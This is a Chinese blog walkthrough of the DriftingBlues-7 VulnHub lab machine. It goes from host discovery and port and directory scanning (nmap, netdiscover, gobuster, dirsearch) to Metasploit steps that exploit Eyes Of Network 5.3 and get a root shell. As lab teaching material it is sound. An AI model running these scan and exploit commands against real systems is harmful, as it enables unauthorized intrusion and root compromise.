对DriftingBlues-7靶机进行渗透测试

最新推荐文章于 2024-06-21 20:56:56 发布
最新推荐文章于 2024-06-21 20:56:56 发布
阅读量515 收藏
点赞数
分类专栏: vulnhub靶场通关教程 文章标签: linux 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zll___/article/details/129838483
版权

目录

环境信息

渗透测试

一、 信息收集

1、打开kali,查看kali的IP地址和子网掩码

2、使用netdiscover扫描主机

3、使用nmap扫描靶机,看有什么服务是可利用的(端口扫描)

4、访问网页,查看基本信息

二、 漏洞查找与利用

1、搜索漏洞

2、msf 模块利用 getshell

参考文章

环境信息

靶机:DriftingBlues-7,IP地址:192.168.52.157

攻击机:Kali,IP地址:192.168.52.134

下载:https://download.vulnhub.com/driftingblues/driftingblues7_vh.ova

渗透测试

一、 信息收集

1、打开kali,查看kali的IP地址和子网掩码

因为靶机和kali现在属于同一个网段,查看kali的IP和子网掩码是为了获得靶机的网段

靶机的网段是:192.168.52.0/24

2、使用netdiscover扫描主机

netdiscover -i eth0 -r 192.168.52.0/24
##netdiscover: -i 指定网卡 -r 指定网段

也可以使用nmap进行主机发现,

nmap -sP 192.168.52.0/24

在使用nmap进行主机发现时,会扫描出本机的IP地址,而netdiscover则不会扫描出本机IP地址

或使用arp-scan -l命令拿到靶机的IP地址

arp-scan -l

 获得靶机靶机ip:192.168.52.157

3、使用nmap扫描靶机,看有什么服务是可利用的(端口扫描)

root@kali:~# nmap -sV -A -p- 192.168.52.157
-sV只扫描端口及其版本号
-A扫描端口的详细信息

 目标靶机开放了22、66、80、111、443、2403、3306以及8086端口

4、访问网页,查看基本信息

使用Firefox插件Wappalyzer,或者扫描网站目录,查看robots.txt等暴露出的信息,可以获取到网站相关信息

使用浏览器插件Wappalyzer,检测网站的CMS,框架,服务器等信息

 Wappalyzer没显示CMS,但从登陆框看到是 Eyes Of Network 网站

利用dirsearch进行网站目录扫描:

dirsearch -u https://192.168.52.157 -e * -i 200
-i 状态码    只显示该状态码
-x 状态码    不显示该状态码

 访问https://192.168.52.157/README.md,获得Eyes Of Network的版本为5.3

访问https://192.168.52.157/bower.json,没有获得其他信息

 使用gobuster工具进行扫描

使用gobuster工具扫描一下66端口,该端口返回的是静态页面

gobuster dir -u http://192.168.52.157:66 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

 使用curl命令查看:http://192.168.52.157:66/index_files/,curl 是常用的命令行工具,用来请求 Web 服务器

curl http://192.168.52.157:66/index_files/

访问http://192.168.52.157:66/eon,发现是个下载链接,kali下载eon文件看看

wget http://192.168.52.157:66/eon

eon文件不知道是什么编码格式,暂时先搁置

使用gobuster工具继续扫描一下66端口下的文件

gobuster dir -u http://192.168.52.157:66 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh

发现了一个/flag.txt,查看一下:

curl http://192.168.52.157:66/flag.txt

 最后,Gobuster工具没有扫描出有价值的目录或者文件

二、 漏洞查找与利用

1、搜索漏洞

kali本地搜索一下漏洞库:searchsploit Eyes Of Network 5.3

2、msf 模块利用 getshell

执行命令进入 msf:msfconsole -q

搜索模块:search Eyes Of Network

使用模块:use 0

show options

设置 kali:set lhost 192.168.52.134

设置攻击目标:set rhosts 192.168.52.157

运行模块:run

 查看 shell 用户:getuid

 发现是 root 用户,直接进入root目录下找到flag

参考文章

靶机渗透练习07-driftingblues7:

靶机渗透练习07-driftingblues7_hirak0的博客-CSDN博客

Vulnhub之Driftingblues 7靶机解题过程:

https://www.cnblogs.com/jason-huawen/p/16909529.html

zll--
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
vulnhub_driftingblues7靶机渗透测试
m0_66225311的博客
10-09 827
本次靶机的网站用户竟然是root用户的,获取shell直接就是root权限没有找到对应cms框架的版本,还是很难进行漏洞利用的,但改框架就一个漏洞利用exp目录扫描是前期的重中之重在没有获得shell,最好先尝试MSF进行漏洞攻击。
vulnhub靶机 | DriftingBlues:7
在下小黄的博客
06-07 1046
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: vulnhub靶机 | DriftingBlues:7 靶机解题过程及思路 微信公众号回复:【靶机】,即可获取本文全部涉及到的工具。 创建时间:2021年6月7日 软件: MindMaster Pro、kali、DriftingBlues:7靶机 DriftingBlues:7靶机解题过程及思路前言:信息搜
VulnHub 之 DRIFTINGBLUES: 7
weixin_42075643的博客
04-28 730
Vulnhub是一个很好的靶机平台,想看官网点这里。 今天学习DRIFTINGBLUES: 7,点击这里下载哦~ 推荐使用virtualBox,我这里是VMware,看自己条件使用 难度:简单 基础练习,大佬可以绕过 接下来导入虚拟机,这里选择NAT模式,成功后,如图: 这里使用kali作为攻击机,首先查看kali的ip: 使用nmap来探测靶机ip: nmap -sS 192.198.81.0/24 可以看到有80端口,先去浏览器找找线索: 是一个network登录界面,试试若口令,爆破啥的
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-7
Aluxian_的博客
06-24 1372
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 下载好了把安装包解压 然后试用VMware即可。kali里使用发现主机 渗透机:kali IP :192.168.205.
靶机渗透练习07-driftingblues7
hirak0的博客
04-14 633
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-7,680/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. 一、搭建靶机环境
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
从入门到入土:nmap出击:使用nmap扫描某台靶机,给出并解读靶机环境的配置情况
Q_U_A_R_T_E_R的博客
09-06 6291
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益。不合适引用,自当删除! 若被用于非法行为,与我本人无关 nmap出击任务操作具体语句010203040506 任务 任务一:使用nmap扫描某台靶机,给出并解读靶机环境的配置情况,撰写实验分析报告。 使用nmap扫描某台靶机,给出并解读靶机环境的配置情况 操作 使用nmap扫描靶机 本来想在windows下使用zenmap替代,
vulnhub实战——DRIFTINGBLUES: 7
Ar_Gin Work
04-18 655
vulnhub实战——Driftingblues7 前言 无聊发现vulnhub上一个新靶机,下载来玩玩看,挺简单的。搜了搜没教程就写个教程给大家参考一下吧~ 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 可以直接用VM打开,ip会自动获取并显示出来(挺人性化的) 正文 通过nmap扫描靶机nmap -sV -O 192.168.171.134 发现有80端口,我们访问一下发现为一个登录页面,后台名称为EyesOfNetwork 再目录
vulnhub靶机 | DriftingBlues:7 write-up
xj28555的博客
05-04 8215
靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 题目的目标是要夺到里面的flag,搭建好环境如图。 首先用nmap扫描一下ip地址 nmap-sP192.168.110.1/24#扫描网段中存活主机 nmap-p-192.168.110.167 #在看看上面运行的服务 nmap-sV192.168.110.167#查看服务版本 上面运行的一些apache、...
靶机driftingblues7_vh
weixin_50339323的博客
08-03 272
一、信息收集 1、靶机ip 扫描存活靶机: nmap -sP 192.168.8.0/24 2、靶机端口 namp -sC -sV 192.168.8.131 显示开放的端口有:22 、80、111、443、3306、8086 3、网站信息收集 访问192.168.8.131 一个登录页面 查看源码,源码内有很多链接,逐一查看,一个网页内有Eyes ofNetwork 的相关信息,包括版本 搜索EyesOfNetwork相关信息,是一个构架管理,...
Vulnhub:DRIFTINGBLUES: 7
NeverForgetCX的博客
02-28 3172
前言: 在朋友的推荐下,空余时间中下载了vulnhub的随机靶机DRIFTINGBLUES:7,尝试实战 靶机在Vulnhub官网下载镜像,完成后可直接用VM打开虚拟机;努力成为专业白帽子!!! 信息收集: 攻击机kali:192.168.2.87 靶机ip:192.168.2.90 打开靶机竟然直接看见了ip信息 IP:192.168.2.90 直接登入kali使用nmap端口扫描 nmap -sV 192.168...
靶机渗透练习08-driftingblues7 (msf的简单利用)
Force~
03-31 780
1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -sn 192.168.111.0/24 2、端口扫描 nmap -sS -A -sV -T4 -p- 192.168
Linux】Xshell和Xftp简介_安装_VMware虚拟机使用
wosixiaokeai的博客
06-19 1253
Xftp是一个功能强大的SFTP、FTP文件传输软件,它允许MS Windows用户安全地在UNIX/Linux和Windows PC之间传输文件。Xftp支持SFTP协议,确保所有通过该软件的网络流量都是加密的。它采用了标准的Windows风格的向导,用户界面直观易用,可以很好地与其他Windows应用程序协同工作。Xftp的特色功能包括同步功能、直接编辑远程文件、多窗格支持、文件交换协议(FXP)支持等,这些功能使得文件传输更加容易和快捷。
Linux中文件查找相关命令比较
lurenyi168的专栏
06-16 463
Linux中与文件定位的命令有find、locate、whereis、which,type。
Linux开发讲课7---Linux sysfs文件系统
最新发布
qq_42837317的博客
06-21 820
Sysfs通过文件和目录的方式组织信息,其中每个文件或目录对应于系统中的一个设备、驱动程序或者其他内核对象。当内核中的设备、驱动程序等对象被创建时,相应的Kobject也会被创建,然后通过Sysfs将其信息暴露给用户空间。Sysfs通常被挂载在/sys目录下,它提供了一种方便的方式,让用户空间的程序可以动态地获取和管理系统中的设备信息,而无需直接访问内核数据结构。(2)创建sysfs文件。其中attr表示将要创建的文件(属性),而show和store分别表示对应的sysfs文件在读和写操作时的回调函数。
python实现对靶机渗透测试
06-03
靶机进行渗透测试需要掌握一定的安全知识和工具使用技巧,以下是一个简单的基于Python的渗透测试脚本示例: ```python import socket # 靶机IP地址和端口号 target_ip = "192.168.1.100" target_port = 80 # ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值